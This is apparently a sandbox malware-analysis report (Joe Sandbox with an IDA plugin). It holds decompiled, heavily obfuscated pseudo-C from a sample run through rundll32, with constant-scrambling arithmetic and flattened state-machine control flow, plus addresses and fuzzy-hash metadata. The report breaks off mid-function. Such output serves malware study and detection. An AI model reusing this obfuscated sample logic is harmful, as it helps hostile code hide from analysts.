                                                                                                                      				_v636 = _v636 ^ 0x0a12807c;
                                                                                                                      				_v660 = 0x62eec7;
                                                                                                                      				_v660 = _v660 >> 3;
                                                                                                                      				_v660 = _v660 / _t230;
                                                                                                                      				_v660 = _v660 ^ 0xcf464c50;
                                                                                                                      				_v660 = _v660 ^ 0xcf48190c;
                                                                                                                      				_v596 = 0xd58755;
                                                                                                                      				_v596 = _v596 + 0xffffee65;
                                                                                                                      				_v596 = _v596 ^ 0x00d4794f;
                                                                                                                      				_v652 = 0xd65add;
                                                                                                                      				_v652 = _v652 + 0x69d5;
                                                                                                                      				_v652 = _v652 + 0xffff6cdd;
                                                                                                                      				_t231 = 0x44;
                                                                                                                      				_v652 = _v652 * 0x6f;
                                                                                                                      				_v652 = _v652 ^ 0x5cddf580;
                                                                                                                      				_v592 = 0x774283;
                                                                                                                      				_v592 = _v592 / _t231;
                                                                                                                      				_v592 = _v592 ^ 0x00057017;
                                                                                                                      				_v608 = 0x66f034;
                                                                                                                      				_v608 = _v608 * 0x1b;
                                                                                                                      				_v608 = _v608 ^ 0x0ad54449;
                                                                                                                      				_v628 = 0x797189;
                                                                                                                      				_v628 = _v628 | 0xd7c49ce2;
                                                                                                                      				_v628 = _v628 + 0x4eb;
                                                                                                                      				_v628 = _v628 ^ 0xd7fc7544;
                                                                                                                      				_v644 = 0xc6323c;
                                                                                                                      				_t232 = 0x1a;
                                                                                                                      				_v644 = _v644 / _t232;
                                                                                                                      				_v644 = _v644 | 0xc7b29cf4;
                                                                                                                      				_v644 = _v644 ^ 0xc7b916af;
                                                                                                                      				_v640 = 0x832b72;
                                                                                                                      				_v640 = _v640 << 1;
                                                                                                                      				_v640 = _v640 ^ 0x03109e90;
                                                                                                                      				_v640 = _v640 ^ 0x021bea31;
                                                                                                                      				_v600 = 0x7e41eb;
                                                                                                                      				_v600 = _v600 ^ 0xc4682a67;
                                                                                                                      				_v600 = _v600 ^ 0xc419d008;
                                                                                                                      				_v648 = 0x2ae2e2;
                                                                                                                      				_v648 = _v648 ^ 0xaa2d9f28;
                                                                                                                      				_v648 = _v648 ^ 0xe0508244;
                                                                                                                      				_v648 = _v648 + 0xffff0ac8;
                                                                                                                      				_v648 = _v648 ^ 0x4a517815;
                                                                                                                      				_v656 = 0x46e590;
                                                                                                                      				_v656 = _v656 + 0xffffd71a;
                                                                                                                      				_v656 = _v656 << 0xb;
                                                                                                                      				_v656 = _v656 | 0x65ccd40d;
                                                                                                                      				_v656 = _v656 ^ 0x75e69a05;
                                                                                                                      				_v616 = 0x212081;
                                                                                                                      				_v616 = _v616 + 0xffff369d;
                                                                                                                      				_v616 = _v616 << 3;
                                                                                                                      				_v616 = _v616 ^ 0x010dc67b;
                                                                                                                      				_v612 = 0xde1992;
                                                                                                                      				_v612 = _v612 | 0x34451690;
                                                                                                                      				_v612 = _v612 ^ 0x34df36a3;
                                                                                                                      				_v664 = 0xb873dc;
                                                                                                                      				_t233 = 9;
                                                                                                                      				_t250 = _v612;
                                                                                                                      				_v664 = _v664 / _t233;
                                                                                                                      				_v664 = _v664 * 0x16;
                                                                                                                      				_v664 = _v664 << 6;
                                                                                                                      				_v664 = _v664 ^ 0x70bc85f2;
                                                                                                                      				_v672 = 0x9e756b;
                                                                                                                      				_v672 = _v672 + 0xfffff8a5;
                                                                                                                      				_v672 = _v672 << 4;
                                                                                                                      				_v672 = _v672 * 0x17;
                                                                                                                      				_v672 = _v672 ^ 0xe3b54af9;
                                                                                                                      				do {
                                                                                                                      					while(_t251 != 0x1d7b34c) {
                                                                                                                      						if(_t251 == 0x2564c7d) {
                                                                                                                      							_t217 = E0035BC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
                                                                                                                      							_t234 = _v648;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
                                                                                                                      							E00354DAD(_v648, _v656, _t250, _v616, _v612);
                                                                                                                      							_t258 = _t258 + 0x24;
                                                                                                                      							goto L14;
                                                                                                                      						} else {
                                                                                                                      							if(_t251 == 0x7be99e6) {
                                                                                                                      								_t248 = _v672;
                                                                                                                      								E0035BBB2(_v664, _t248,  &_v588);
                                                                                                                      								_pop(_t234);
                                                                                                                      								_t251 = 0xba7f047;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0xb29cf6f) {
                                                                                                                      									_t234 = 0;
                                                                                                                      									_t248 = _v624;
                                                                                                                      									_t223 = E0035E938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
                                                                                                                      									_t250 = _t223;
                                                                                                                      									_t258 = _t258 + 0x28;
                                                                                                                      									__eflags = _t223 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t251 = 0x2564c7d;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xba7f047) {
                                                                                                                      										_t224 = E00349A1E();
                                                                                                                      										_t256 = _v588 - _v548;
                                                                                                                      										asm("sbb ecx, [esp+0x94]");
                                                                                                                      										__eflags = _v584 - _t248;
                                                                                                                      										if(__eflags >= 0) {
                                                                                                                      											if(__eflags > 0) {
                                                                                                                      												L19:
                                                                                                                      												_t227 = 1;
                                                                                                                      												__eflags = 1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t256 - _t224;
                                                                                                                      												if(_t256 >= _t224) {
                                                                                                                      													goto L19;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t265 = _t251 - 0xcb5264b;
                                                                                                                      										if(_t251 != 0xcb5264b) {
                                                                                                                      											goto L14;
                                                                                                                      										} else {
                                                                                                                      											_t248 = _v668;
                                                                                                                      											_t226 = E003612A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
                                                                                                                      											_t258 = _t258 + 0xc;
                                                                                                                      											if(_t226 != 0) {
                                                                                                                      												_t251 = 0xb29cf6f;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t227;
                                                                                                                      					}
                                                                                                                      					_t251 = 0xcb5264b;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t251 - 0xe5304db;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L20;
                                                                                                                      			}













































                                                                                                                      0x0035bfa4
                                                                                                                      0x0035bfac
                                                                                                                      0x0035bfb4
                                                                                                                      0x0035bfbc
                                                                                                                      0x0035bfc4
                                                                                                                      0x0035bfd1
                                                                                                                      0x0035bfd4
                                                                                                                      0x0035bfd8
                                                                                                                      0x0035bfe0
                                                                                                                      0x0035bfee
                                                                                                                      0x0035bff2
                                                                                                                      0x0035bffa
                                                                                                                      0x0035c007
                                                                                                                      0x0035c00b
                                                                                                                      0x0035c013
                                                                                                                      0x0035c01b
                                                                                                                      0x0035c023
                                                                                                                      0x0035c02b
                                                                                                                      0x0035c035
                                                                                                                      0x0035c041
                                                                                                                      0x0035c046
                                                                                                                      0x0035c04c
                                                                                                                      0x0035c059
                                                                                                                      0x0035c061
                                                                                                                      0x0035c069
                                                                                                                      0x0035c06d
                                                                                                                      0x0035c075
                                                                                                                      0x0035c07d
                                                                                                                      0x0035c085
                                                                                                                      0x0035c08d
                                                                                                                      0x0035c095
                                                                                                                      0x0035c09d
                                                                                                                      0x0035c0a5
                                                                                                                      0x0035c0ad
                                                                                                                      0x0035c0b5
                                                                                                                      0x0035c0bd
                                                                                                                      0x0035c0c5
                                                                                                                      0x0035c0cd
                                                                                                                      0x0035c0d2
                                                                                                                      0x0035c0da
                                                                                                                      0x0035c0e2
                                                                                                                      0x0035c0ea
                                                                                                                      0x0035c0f2
                                                                                                                      0x0035c0f7
                                                                                                                      0x0035c0ff
                                                                                                                      0x0035c107
                                                                                                                      0x0035c10f
                                                                                                                      0x0035c117
                                                                                                                      0x0035c123
                                                                                                                      0x0035c126
                                                                                                                      0x0035c12a
                                                                                                                      0x0035c133
                                                                                                                      0x0035c137
                                                                                                                      0x0035c13c
                                                                                                                      0x0035c144
                                                                                                                      0x0035c14c
                                                                                                                      0x0035c154
                                                                                                                      0x0035c15e
                                                                                                                      0x0035c162
                                                                                                                      0x0035c16a
                                                                                                                      0x0035c16a
                                                                                                                      0x0035c178
                                                                                                                      0x0035c254
                                                                                                                      0x0035c269
                                                                                                                      0x0035c26d
                                                                                                                      0x0035c276
                                                                                                                      0x0035c27c
                                                                                                                      0x0035c281
                                                                                                                      0x00000000
                                                                                                                      0x0035c17e
                                                                                                                      0x0035c184
                                                                                                                      0x0035c21e
                                                                                                                      0x0035c22b
                                                                                                                      0x0035c230
                                                                                                                      0x0035c231
                                                                                                                      0x00000000
                                                                                                                      0x0035c18a
                                                                                                                      0x0035c190
                                                                                                                      0x0035c1f3
                                                                                                                      0x0035c200
                                                                                                                      0x0035c204
                                                                                                                      0x0035c209
                                                                                                                      0x0035c20b
                                                                                                                      0x0035c20e
                                                                                                                      0x0035c211
                                                                                                                      0x0035c217
                                                                                                                      0x00000000
                                                                                                                      0x0035c217
                                                                                                                      0x0035c192
                                                                                                                      0x0035c198
                                                                                                                      0x0035c299
                                                                                                                      0x0035c2a2
                                                                                                                      0x0035c2ad
                                                                                                                      0x0035c2b4
                                                                                                                      0x0035c2b6
                                                                                                                      0x0035c2b8
                                                                                                                      0x0035c2be
                                                                                                                      0x0035c2c0
                                                                                                                      0x0035c2c0
                                                                                                                      0x0035c2ba
                                                                                                                      0x0035c2ba
                                                                                                                      0x0035c2bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035c2bc
                                                                                                                      0x0035c2b8
                                                                                                                      0x0035c19e
                                                                                                                      0x0035c19e
                                                                                                                      0x0035c1a4
                                                                                                                      0x00000000
                                                                                                                      0x0035c1aa
                                                                                                                      0x0035c1ba
                                                                                                                      0x0035c1be
                                                                                                                      0x0035c1c3
                                                                                                                      0x0035c1c8
                                                                                                                      0x0035c1ce
                                                                                                                      0x00000000
                                                                                                                      0x0035c1ce
                                                                                                                      0x0035c1c8
                                                                                                                      0x0035c1a4
                                                                                                                      0x0035c198
                                                                                                                      0x0035c190
                                                                                                                      0x0035c184
                                                                                                                      0x0035c2c4
                                                                                                                      0x0035c2cd
                                                                                                                      0x0035c2cd
                                                                                                                      0x0035c286
                                                                                                                      0x0035c28b
                                                                                                                      0x0035c28b
                                                                                                                      0x0035c28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: 08efc000244c6a2e5130f5e3515ca5fb7b69ff7697cc9c2fb7e8ba2045fa0289
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: 56B15172818380AFC758CF65C58981BFBE1BBC4748F118A1DF9A696260D3B18949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003541A7() {
                                                                                                                      				signed int _v4;
                                                                                                                      				char _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t218;
                                                                                                                      				signed int _t219;
                                                                                                                      				signed int _t227;
                                                                                                                      				intOrPtr _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t251;
                                                                                                                      				signed int* _t255;
                                                                                                                      
                                                                                                                      				_t255 =  &_v100;
                                                                                                                      				_v68 = 0xec424;
                                                                                                                      				_v68 = _v68 | 0x15a76721;
                                                                                                                      				_v68 = _v68 + 0xba51;
                                                                                                                      				_v68 = _v68 ^ 0x95b0a177;
                                                                                                                      				_v32 = 0x9cb342;
                                                                                                                      				_v32 = _v32 >> 0xf;
                                                                                                                      				_v32 = _v32 ^ 0x0000013b;
                                                                                                                      				_v72 = 0xae6f3e;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v72 = _v72 * 0x1b;
                                                                                                                      				_t251 = 0x38ba83c;
                                                                                                                      				_v72 = _v72 ^ 0x000cf0a1;
                                                                                                                      				_v40 = 0xd29c0d;
                                                                                                                      				_v40 = _v40 | 0x0be9fd1c;
                                                                                                                      				_v40 = _v40 ^ 0x0bf96d7b;
                                                                                                                      				_v96 = 0x10a61a;
                                                                                                                      				_v96 = _v96 + 0x673b;
                                                                                                                      				_v96 = _v96 + 0x336d;
                                                                                                                      				_v96 = _v96 + 0x2fcb;
                                                                                                                      				_v96 = _v96 ^ 0x001323ac;
                                                                                                                      				_v100 = 0x9d3afd;
                                                                                                                      				_v100 = _v100 << 7;
                                                                                                                      				_v100 = _v100 << 5;
                                                                                                                      				_t230 = 0x55;
                                                                                                                      				_v100 = _v100 / _t230;
                                                                                                                      				_v100 = _v100 ^ 0x027b67ec;
                                                                                                                      				_v84 = 0x9cb324;
                                                                                                                      				_v84 = _v84 + 0xffffbca6;
                                                                                                                      				_v84 = _v84 + 0xd0f1;
                                                                                                                      				_v84 = _v84 << 0xa;
                                                                                                                      				_v84 = _v84 ^ 0x750d3d14;
                                                                                                                      				_v88 = 0x3cd70;
                                                                                                                      				_v88 = _v88 << 0xc;
                                                                                                                      				_v88 = _v88 + 0x865d;
                                                                                                                      				_t231 = 0x65;
                                                                                                                      				_v88 = _v88 / _t231;
                                                                                                                      				_v88 = _v88 ^ 0x009e1e24;
                                                                                                                      				_v24 = 0xf6c479;
                                                                                                                      				_v24 = _v24 ^ 0xf85d6d57;
                                                                                                                      				_v24 = _v24 ^ 0xf8a5b53e;
                                                                                                                      				_v92 = 0xa4533c;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_v92 = _v92 ^ 0x907f3c14;
                                                                                                                      				_v92 = _v92 ^ 0x0e792839;
                                                                                                                      				_v28 = 0xd04f15;
                                                                                                                      				_v28 = _v28 * 0x53;
                                                                                                                      				_v28 = _v28 ^ 0x4380c19a;
                                                                                                                      				_v36 = 0x6fba0d;
                                                                                                                      				_v36 = _v36 * 0x6b;
                                                                                                                      				_v36 = _v36 ^ 0x2ebab037;
                                                                                                                      				_v20 = 0x23d496;
                                                                                                                      				_v20 = _v20 ^ 0x4cebd1bd;
                                                                                                                      				_v20 = _v20 ^ 0x4cc2ad40;
                                                                                                                      				_v60 = 0x3b5a6d;
                                                                                                                      				_v60 = _v60 >> 0x10;
                                                                                                                      				_v60 = _v60 << 7;
                                                                                                                      				_v60 = _v60 ^ 0x0000f98a;
                                                                                                                      				_v64 = 0xf0d036;
                                                                                                                      				_v64 = _v64 + 0xffff53b4;
                                                                                                                      				_v64 = _v64 ^ 0x894664b9;
                                                                                                                      				_v64 = _v64 ^ 0x89bf3867;
                                                                                                                      				_v48 = 0xb08deb;
                                                                                                                      				_v48 = _v48 | 0x78ca9a10;
                                                                                                                      				_v48 = _v48 + 0xffff33de;
                                                                                                                      				_v48 = _v48 ^ 0x78fbc05b;
                                                                                                                      				_v16 = 0x2da7c5;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 ^ 0x00092ddb;
                                                                                                                      				_v52 = 0x523898;
                                                                                                                      				_t232 = 0x59;
                                                                                                                      				_t227 = _v4;
                                                                                                                      				_v52 = _v52 / _t232;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 ^ 0x01d201e4;
                                                                                                                      				_v56 = 0x19cc06;
                                                                                                                      				_v56 = _v56 + 0xfffff128;
                                                                                                                      				_v56 = _v56 << 0xe;
                                                                                                                      				_v56 = _v56 ^ 0x6f4387c2;
                                                                                                                      				_v76 = 0x5278ca;
                                                                                                                      				_v76 = _v76 << 9;
                                                                                                                      				_v76 = _v76 ^ 0x8826d706;
                                                                                                                      				_t233 = 0x5c;
                                                                                                                      				_v76 = _v76 * 0x5a;
                                                                                                                      				_v76 = _v76 ^ 0xc3a97567;
                                                                                                                      				_v12 = 0xdfbc19;
                                                                                                                      				_v12 = _v12 + 0xffff7584;
                                                                                                                      				_v12 = _v12 ^ 0x00deabf9;
                                                                                                                      				_v44 = 0x7b85bc;
                                                                                                                      				_v44 = _v44 * 9;
                                                                                                                      				_v44 = _v44 ^ 0xa28277a7;
                                                                                                                      				_v44 = _v44 ^ 0xa6d14151;
                                                                                                                      				_v80 = 0xd07577;
                                                                                                                      				_v80 = _v80 | 0x5043dc19;
                                                                                                                      				_v80 = _v80 * 0x49;
                                                                                                                      				_v80 = _v80 * 0x43;
                                                                                                                      				_v80 = _v80 ^ 0x4228a280;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t218 = 0x35852e4;
                                                                                                                      					do {
                                                                                                                      						while(_t251 != _t218) {
                                                                                                                      							if(_t251 == 0x38ba83c) {
                                                                                                                      								_t251 = 0xe9ff08f;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0x83f204b) {
                                                                                                                      									E00347AF8(_v76, _v12, _v8, _v44, _v80);
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xe0715ba) {
                                                                                                                      										_push(_v100);
                                                                                                                      										_push(_v96);
                                                                                                                      										_t238 = _v72;
                                                                                                                      										_push(0x34118c);
                                                                                                                      										__eflags = E00348786(_v84, _v40, _v72,  &_v8, _v88, E0034AB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
                                                                                                                      										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
                                                                                                                      										E0034AE03(_v20, _v60, _v64, _t222);
                                                                                                                      										_t255 =  &(_t255[0x12]);
                                                                                                                      										L14:
                                                                                                                      										_t218 = 0x35852e4;
                                                                                                                      										_t233 = 0x5c;
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										if(_t251 != 0xe9ff08f) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t228 =  *0x36520c; // 0x0
                                                                                                                      											_t229 = _t228 + 0x220;
                                                                                                                      											while( *_t229 != _t233) {
                                                                                                                      												_t229 = _t229 + 2;
                                                                                                                      												__eflags = _t229;
                                                                                                                      											}
                                                                                                                      											_t227 = _t229 + 2;
                                                                                                                      											_t251 = 0xe0715ba;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _v4;
                                                                                                                      						}
                                                                                                                      						_t219 = E0034EFA6(_v48, _v16, _t227, _v52, _v8, _v56);
                                                                                                                      						_t255 =  &(_t255[4]);
                                                                                                                      						__eflags = _t219;
                                                                                                                      						_t251 = 0x83f204b;
                                                                                                                      						_t196 = _t219 == 0;
                                                                                                                      						__eflags = _t196;
                                                                                                                      						_v4 = 0 | _t196;
                                                                                                                      						goto L14;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t251 - 0xdf478d7;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}







































                                                                                                                      0x003544be
                                                                                                                      0x00000000
                                                                                                                      0x003544c4
                                                                                                                      0x003544c4
                                                                                                                      0x003544ca
                                                                                                                      0x003544d5
                                                                                                                      0x003544d2
                                                                                                                      0x003544d2
                                                                                                                      0x003544d2
                                                                                                                      0x003544da
                                                                                                                      0x003544dd
                                                                                                                      0x00000000
                                                                                                                      0x003544dd
                                                                                                                      0x003544be
                                                                                                                      0x003544b6
                                                                                                                      0x003544ae
                                                                                                                      0x003545c1
                                                                                                                      0x003545cc
                                                                                                                      0x003545cc
                                                                                                                      0x00354577
                                                                                                                      0x0035457e
                                                                                                                      0x00354581
                                                                                                                      0x00354583
                                                                                                                      0x00354588
                                                                                                                      0x00354588
                                                                                                                      0x0035458b
                                                                                                                      0x00000000
                                                                                                                      0x00354597
                                                                                                                      0x00354597
                                                                                                                      0x00354597
                                                                                                                      0x00000000
                                                                                                                      0x003545a3

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: d2820ce15e67a8c1b3fdc2cc6c36988351b5d1705ecb523ec60d09aa6cd659ae
                                                                                                                      • Instruction ID: 526989d15638a1daf0916be80c375a9cc00ef1fd1f8ecf0ab2da353b6482654e
                                                                                                                      • Opcode Fuzzy Hash: d2820ce15e67a8c1b3fdc2cc6c36988351b5d1705ecb523ec60d09aa6cd659ae
                                                                                                                      • Instruction Fuzzy Hash: E0A121B25093809FC359CF25D98981BBBF1BBC9748F104A1DF6969A260D3B1CA49CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035FF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				unsigned int _v112;
                                                                                                                      				unsigned int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				void* _t147;
                                                                                                                      				intOrPtr _t161;
                                                                                                                      				signed int _t169;
                                                                                                                      				void* _t172;
                                                                                                                      				void* _t188;
                                                                                                                      				intOrPtr* _t189;
                                                                                                                      				void* _t191;
                                                                                                                      				void* _t192;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t188 = __edx;
                                                                                                                      				_t189 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t147);
                                                                                                                      				_v60 = 0xe50c8f;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_t192 = _t191 + 0x14;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v76 = 0x2f3c66;
                                                                                                                      				_t172 = 0x80c5f05;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 ^ 0x00179e33;
                                                                                                                      				_v100 = 0xdfcc0f;
                                                                                                                      				_v100 = _v100 + 0x5dbe;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x00087c2f;
                                                                                                                      				_v112 = 0xadc62;
                                                                                                                      				_v112 = _v112 | 0x1372df76;
                                                                                                                      				_v112 = _v112 >> 7;
                                                                                                                      				_v112 = _v112 ^ 0x002d2981;
                                                                                                                      				_v116 = 0xfe909d;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_t169 = 0x44;
                                                                                                                      				_v116 = _v116 / _t169;
                                                                                                                      				_v116 = _v116 >> 0xc;
                                                                                                                      				_v116 = _v116 ^ 0x0009e39a;
                                                                                                                      				_v120 = 0xded18e;
                                                                                                                      				_v120 = _v120 + 0xffff5063;
                                                                                                                      				_v120 = _v120 ^ 0xd3175283;
                                                                                                                      				_v120 = _v120 * 0x6d;
                                                                                                                      				_v120 = _v120 ^ 0x2cc94156;
                                                                                                                      				_v124 = 0xc7fb01;
                                                                                                                      				_v124 = _v124 + 0xffff9b92;
                                                                                                                      				_v124 = _v124 | 0x8f919799;
                                                                                                                      				_v124 = _v124 + 0xaff8;
                                                                                                                      				_v124 = _v124 ^ 0x8fd45f25;
                                                                                                                      				_v68 = 0xadf2f0;
                                                                                                                      				_v68 = _v68 << 3;
                                                                                                                      				_v68 = _v68 ^ 0x056cc5e6;
                                                                                                                      				_v72 = 0x9db552;
                                                                                                                      				_v72 = _v72 << 6;
                                                                                                                      				_v72 = _v72 ^ 0x276b9b1e;
                                                                                                                      				_v64 = 0x9edb03;
                                                                                                                      				_v64 = _v64 ^ 0x7ad40136;
                                                                                                                      				_v64 = _v64 ^ 0x7a416b45;
                                                                                                                      				_v96 = 0x899086;
                                                                                                                      				_v96 = _v96 + 0x3abe;
                                                                                                                      				_v96 = _v96 + 0xffff9b83;
                                                                                                                      				_v96 = _v96 ^ 0x008dc818;
                                                                                                                      				_v80 = 0x1613a8;
                                                                                                                      				_v80 = _v80 >> 8;
                                                                                                                      				_v80 = _v80 ^ 0x000fe8a1;
                                                                                                                      				_v84 = 0xc2e1e1;
                                                                                                                      				_v84 = _v84 << 4;
                                                                                                                      				_v84 = _v84 ^ 0x0c264902;
                                                                                                                      				_v104 = 0x78369d;
                                                                                                                      				_v104 = _v104 ^ 0x8f03ebf2;
                                                                                                                      				_v104 = _v104 * 0x5b;
                                                                                                                      				_v104 = _v104 ^ 0x010dd9c3;
                                                                                                                      				_v88 = 0x6e061c;
                                                                                                                      				_v88 = _v88 * 0x7f;
                                                                                                                      				_v88 = _v88 >> 6;
                                                                                                                      				_v88 = _v88 ^ 0x00d4f969;
                                                                                                                      				_v92 = 0x56c027;
                                                                                                                      				_v92 = _v92 ^ 0x48eed99d;
                                                                                                                      				_v92 = _v92 + 0xffff6999;
                                                                                                                      				_v92 = _v92 ^ 0x48bab2c5;
                                                                                                                      				_v108 = 0xffa91b;
                                                                                                                      				_v108 = _v108 * 0x23;
                                                                                                                      				_v108 = _v108 | 0x4c85b786;
                                                                                                                      				_v108 = _v108 * 0x3a;
                                                                                                                      				_v108 = _v108 ^ 0x23a92266;
                                                                                                                      				do {
                                                                                                                      					while(_t172 != 0xd9dda6) {
                                                                                                                      						if(_t172 == 0x1ff9304) {
                                                                                                                      							E00354D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
                                                                                                                      							_t192 = _t192 + 8;
                                                                                                                      							_t172 = 0xcf0dfe0;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t172 == 0x2f8759c) {
                                                                                                                      								_push(_t172);
                                                                                                                      								_push(_t172);
                                                                                                                      								_t161 = E00353512( *(_t189 + 4));
                                                                                                                      								 *_t189 = _t161;
                                                                                                                      								__eflags = _t161;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t172 = 0x3d5ab39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t172 == 0x3d5ab39) {
                                                                                                                      									E003564C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
                                                                                                                      									_t192 = _t192 + 0x10;
                                                                                                                      									_t172 = 0x1ff9304;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t172 == 0x80c5f05) {
                                                                                                                      										_t172 = 0xd9dda6;
                                                                                                                      										 *_t189 = 0;
                                                                                                                      										 *(_t189 + 4) = _v76;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t172 == 0xcf0dfe0) {
                                                                                                                      											E0035F88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
                                                                                                                      											_t192 = _t192 + 0xc;
                                                                                                                      											_t172 = 0xfec6e86;
                                                                                                                      											continue;
                                                                                                                      										} else {
